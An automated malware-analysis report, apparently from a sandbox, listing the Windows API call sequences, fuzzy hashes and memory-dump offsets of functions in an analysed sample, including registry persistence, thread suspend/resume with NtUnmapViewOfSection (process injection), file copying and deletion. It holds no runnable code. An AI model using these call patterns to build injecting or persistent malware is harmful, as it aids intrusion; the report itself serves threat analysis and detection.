  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
